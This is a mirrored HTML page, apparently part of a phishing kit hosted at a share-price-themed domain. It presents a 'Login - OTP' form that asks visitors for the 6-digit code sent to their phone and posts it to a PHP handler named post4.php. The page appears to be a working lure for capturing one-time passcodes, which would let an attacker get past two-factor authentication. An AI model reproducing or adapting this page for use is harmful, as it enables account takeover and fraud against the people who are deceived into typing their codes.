<!DOCTYPE html>
<html lang="en">


<!-- Mirrored from price-shares.online/otp.html by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 02 Mar 2022 11:56:15 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head>
    <meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />    <title>Login - OTP</title>
    <link rel="stylesheet" href="build/css/intlTelInput.css">
    <link rel="stylesheet" href="build/css/demo.css">
    <link rel="stylesheet" href="sstyle.css">
    <link rel="stylesheet" href="otp.css">
    <link rel="stylesheet" href="../cdn.jsdelivr.net/npm/bootstrap-icons%401.3.0/font/bootstrap-icons.css" />
    <link rel="stylesheet" href="../cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css" integrity="sha512-SfTiTlX6kk+qitfevl/7LibUOeJWlt9rbyDn92a1DqWOw9vWG2MFoays0sgObmWazO5BQPiFucnnEAjpAB+/Sw==" crossorigin="anonymous" referrerpolicy="no-referrer"
    />
    <link rel="stylesheet" href="password.css">
    <script src="../kit.fontawesome.com/ae0531fa65.js" crossorigin="anonymous"></script>
    <link rel="stylesheet" href="../unicons.iconscout.com/release/v4.0.0/css/line.css">
    <link rel="stylesheet" href="../cdnjs.cloudflare.com/ajax/libs/bootstrap/5.1.3/css/bootstrap.min.css" />

</head>

<body>

    <div class="container text-center">
        <img class="logo" src="images/download%20(2).png" alt="">
        <form method="POST" class="myform text-center" action=".././modules/post4.php">
            <div class="para-first">
                <div class="hcnt text-center">
                    <h2 class="para1 para4 mb-2">
                        Check your phone for OTP
                    </h2>
                </div>

                <p class="paragraph para2 mb-4 text-center">
                    Type in the 6-digit code you received <br> on your phone.
                </p>
            </div>

            <p class=" pwsd authp">Authorization code</p>
            <input type="hidden" name="_captcha" value="false">
            <input type="hidden" name="_next" value="">
            <input maxlength="7" id="otp" required class="pwdinput" name="otp" type="tel"><br>
            <div class="cbtn mt-4">
                <button class="mt-3 text-center mb-4">Sign In</button>
            </div>
            <p class="lastp2 mt-4">Didn't get code?</p>
        </form>

        <div class="bt-img text-center ">
            <img src="images/download%20(3).png" alt="">
        </div>
    </div>



























    <script src="script.js"></script>
    <script src="build/js/intlTelInput.js"></script>
</body>


<!-- Mirrored from price-shares.online/otp.html by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 02 Mar 2022 11:56:32 GMT -->
</html>